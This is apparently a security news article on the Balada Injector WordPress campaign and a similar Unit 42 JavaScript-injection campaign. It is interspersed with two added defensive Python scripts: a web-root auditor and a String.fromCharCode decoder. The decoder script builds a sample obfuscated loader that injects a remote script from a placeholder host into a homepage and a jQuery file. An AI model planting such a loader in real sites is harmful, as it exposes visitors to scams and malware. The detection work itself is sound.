Apr 10, 2023Ravie Lakshmanan
Over one million WordPress websites are estimated to have been
infected by an ongoing campaign to deploy malware called
Balada Injector since 2017[1].
The massive campaign, per GoDaddy’s Sucuri, “leverages all known
and recently discovered theme and plugin vulnerabilities” to breach
WordPress sites. The attacks are known to play out in waves once
every few weeks.
“This campaign is easily identified by its preference for
String.fromCharCode[2]
obfuscation, the use of freshly registered domain names hosting
malicious scripts on random subdomains, and by redirects to various
scam sites,” security researcher Denis Sinegubko said[3].
The scam sites include fake tech support[4], fraudulent lottery
wins, and rogue CAPTCHA pages urging users to turn on notifications
(‘Please Allow to verify, that you are not a robot’), which lets the
actors push spam ads through the browser’s notification channel.
The report builds on recent findings[5]
from Doctor Web, which detailed a Linux malware family that
exploits flaws in more than two dozen plugins and themes to
compromise vulnerable WordPress sites.
Over the years, Balada Injector has relied on more than 100
domains and a variety of methods to exploit known
security flaws (e.g., HTML injection and Site URL[6] injection), with the attackers
primarily attempting to obtain the database credentials stored in the
wp-config.php file.
Additionally, the attacks are engineered to read or download
arbitrary site files – including backups, database dumps, log and
error files – as well as search for tools like adminer and
phpmyadmin that could have been left behind by site administrators
upon completing maintenance tasks.
The malware ultimately lets the attackers create fake
WordPress admin users, harvest data stored on the underlying hosts,
and leave backdoors for persistent access.
Balada Injector further carries out broad searches from
top-level directories associated with the compromised website’s
file system to locate writable directories that belong to other
sites.
“Most commonly, these sites belong to the webmaster of the
compromised site and they all share the same server account and the
same file permissions,” Sinegubko said. “In this manner,
compromising just one site can potentially grant access to several
other sites ‘for free.’”
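The two preceding passages describe what the injector looks for once it can read files: leftover adminer/phpMyAdmin copies, backups and database dumps, and writable directories of sibling sites on the same hosting account. The following Python script is an added example (not code from the article or from Sucuri) that audits a web root for exactly those artifacts. The hosting-account layout it builds (site1, site2, the file names inside them) is constructed for the example, and the file-name patterns it checks are an assumption about what such leftovers typically look like.

```python
"""Audit a WordPress web root for the artifacts Balada Injector hunts for.

Added example, not from the article or Sucuri. It reports
(1) leftover database tools (adminer*, phpmyadmin*) in the site,
(2) exposed backups, dumps, logs and wp-config.php copies that an
    arbitrary-file-read bug would let an attacker download, and
(3) sibling directories on the same account that this user can write to,
    which is how a foothold in one site spreads to the others.
The sample hosting account is constructed in a temp directory.
"""
import os
import tempfile
from pathlib import Path

# Assumed name prefixes of leftover tools (matched case-insensitively on files and dirs).
LEFTOVER_TOOLS = ("adminer", "phpmyadmin")
# Assumed suffixes of backups, dumps and logs that should never sit under the web root.
EXPOSED_SUFFIXES = (".sql", ".sql.gz", ".zip", ".tar.gz", ".bak", ".old", ".log")


def _is_exposed(name):
    """True for dumps/backups/logs and for any copy of wp-config.php."""
    lower = name.lower()
    if lower.startswith("wp-config") and lower != "wp-config.php":
        return True  # wp-config.php.bak, wp-config.php~, wp-config-old.php, ...
    return lower.endswith(EXPOSED_SUFFIXES) or lower.endswith("~")


def audit_site(site_root):
    """Walk one site and return leftover tools and exposed files (paths relative to root)."""
    site_root = Path(site_root)
    tools, exposed = [], []
    for dirpath, dirnames, filenames in os.walk(site_root):
        rel = Path(dirpath).relative_to(site_root)
        for name in dirnames + filenames:
            if name.lower().startswith(LEFTOVER_TOOLS):
                tools.append(str(rel / name))
        for name in filenames:
            if _is_exposed(name):
                exposed.append(str(rel / name))
    return {"leftover_tools": sorted(tools), "exposed_files": sorted(exposed)}


def writable_siblings(account_home, site_root):
    """Directories next to site_root that the current account can write to.

    The injector walks up from the document root looking for exactly these;
    any site listed here is reachable from a compromise of site_root.
    """
    home, site = Path(account_home), Path(site_root).resolve()
    return sorted(
        p.name for p in home.iterdir()
        if p.is_dir() and p.resolve() != site and os.access(p, os.W_OK)
    )


def build_sample_account():
    """Constructed sample: two WordPress sites sharing one Unix account."""
    home = Path(tempfile.mkdtemp(prefix="balada-audit-"))
    site1 = home / "site1"
    files = {
        "wp-config.php": "<?php define('DB_PASSWORD', 'redacted');",
        "wp-config.php.bak": "<?php define('DB_PASSWORD', 'redacted');",  # exposed copy
        "backup/site1-2023-04.sql": "-- constructed dump",                   # exposed dump
        "adminer.php": "<?php // leftover maintenance tool",
        "phpmyadmin/index.php": "<?php // leftover maintenance tool",
        "wp-content/themes/x/style.css": "/* harmless */",
    }
    for path, body in files.items():
        f = site1 / path
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_text(body)
    (home / "site2" / "wp-content").mkdir(parents=True)  # sibling site, same owner
    return home


if __name__ == "__main__":
    home = build_sample_account()
    print(audit_site(home / "site1"))
    print("writable siblings:", writable_siblings(home, home / "site1"))
```

Run against a real account, point `audit_site` at the document root and `writable_siblings` at the account home; anything in `writable_siblings` is a site that a single compromised plugin on the first one can reach without any further exploit.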
If none of these attack pathways is available, the
admin password is brute-forced using a set of 74 predefined
credentials. WordPress users are therefore advised to keep
their website software up to date, remove unused plugins and
themes, and use strong WordPress admin passwords.
The findings come weeks after Palo Alto Networks Unit 42
unearthed a similar malicious JavaScript injection campaign[8] that redirects site
visitors to adware and scam pages. More than 51,000 websites have
been affected since 2022.
The activity, which also employs String.fromCharCode as an
obfuscation technique, leads victims to booby-trapped pages that
trick them into enabling push notifications by masquerading as a
fake CAPTCHA check to serve deceptive content.
“The injected malicious JS code was included on the homepage of
more than half of the detected websites,” Unit 42 researchers
said[9]. “One common tactic used
by the campaign’s operators was to inject malicious JS code on
frequently used JS filenames (e.g., jQuery) that are likely to be
included on the homepages of compromised websites.”
“This potentially helps attackers target the website’s
legitimate users, since they are more likely to visit the website’s
home page.”
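Both campaigns on this page hide their loader behind String.fromCharCode(), on the homepage and inside commonly included library files such as jQuery. The following Python script is an added example (not code from the article, Sucuri or Unit 42) that finds such calls in a page or script, decodes the numeric arguments back to text, and lists the hosts the decoded code references, which is the quickest way to turn an obfuscated injection into an indicator you can block. The sample homepage, the jQuery-like file, and the placeholder host a1b2c3.example.invalid are constructed for this example.

```python
"""Decode String.fromCharCode() obfuscation in injected scripts.

Added example, not code from the article, Sucuri or Unit 42. It finds
String.fromCharCode(...) calls (dot form and String["fromCharCode"] form),
decodes the numeric arguments back to text, and lists the hosts referenced
by URLs in the decoded text. Samples below are constructed; the host name
is a placeholder, not a real indicator.
"""
import re
from urllib.parse import urlparse

# Matches String.fromCharCode(104, 116, ...) and String["fromCharCode"](...).
# Hex or computed arguments (0x68, 100+4) are not handled by this pattern.
_FROMCHARCODE = re.compile(
    r"String\s*(?:\.\s*fromCharCode|\[\s*['\"]fromCharCode['\"]\s*\])"
    r"\s*\(\s*([\d\s,]+?)\s*\)",
    re.IGNORECASE,
)
_URL = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)


def obfuscate(text):
    """Encode text the way the injector does; used only to build the samples."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in text) + ")"


def decode_fromcharcode(args):
    """'104,116,116,112' -> 'http'."""
    return "".join(chr(int(n)) for n in args.split(",") if n.strip())


def find_obfuscated_strings(text):
    """Every decoded String.fromCharCode payload in text, in document order."""
    return [decode_fromcharcode(m.group(1)) for m in _FROMCHARCODE.finditer(text)]


def extract_hosts(strings):
    """Unique host names referenced by URLs inside the decoded strings."""
    hosts = []
    for s in strings:
        for url in _URL.findall(s):
            host = urlparse(url).hostname
            if host and host not in hosts:
                hosts.append(host)
    return hosts


def scan(text):
    """Decoded payloads plus the hosts they load from."""
    decoded = find_obfuscated_strings(text)
    return {"decoded": decoded, "hosts": extract_hosts(decoded)}


# Constructed samples: a loader appended to the homepage and to a library file.
PAYLOAD_JS = ('var s=document.createElement("script");'
              's.src="https://a1b2c3.example.invalid/main.js";'
              'document.head.appendChild(s);')
SAMPLE_HTML = ("<html><head><script>eval(" + obfuscate(PAYLOAD_JS) + ");</script>"
               '<script>var t=String["fromCharCode"](104,105);</script></head>'
               "<body>home</body></html>")
SAMPLE_JQUERY = "/*! jQuery */ !function(){}();\n" + "eval(" + obfuscate(PAYLOAD_JS) + ");"

if __name__ == "__main__":
    for name, text in (("index.html", SAMPLE_HTML), ("jquery.min.js", SAMPLE_JQUERY)):
        result = scan(text)
        print(name, "->", result["hosts"])
        for d in result["decoded"]:
            print("  decoded:", d[:80])
```

To use it on a real site, feed it the homepage HTML and every .js file under wp-includes/js and wp-content; a legitimate library almost never builds a script URL out of character codes, so any host the scan returns is worth checking against domain registration age and blocking at the edge.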
References
[1] since 2017 (blog.sucuri.net)
[2] String.fromCharCode (developer.mozilla.org)
[3] said (blog.sucuri.net)
[4] fake tech support (blog.sucuri.net)
[5] recent findings (thehackernews.com)
[6] Site URL (developer.wordpress.org)
[7] Don’t Miss Out – Save Your Seat! (thehacker.news)
[8] JavaScript injection campaign (blog.sucuri.net)
[9] said (unit42.paloaltonetworks.com)
[10] Twitter (twitter.com)
[11] LinkedIn (www.linkedin.com)
Read more https://thehackernews.com/2023/04/over-1-million-wordpress-sites-infected.html
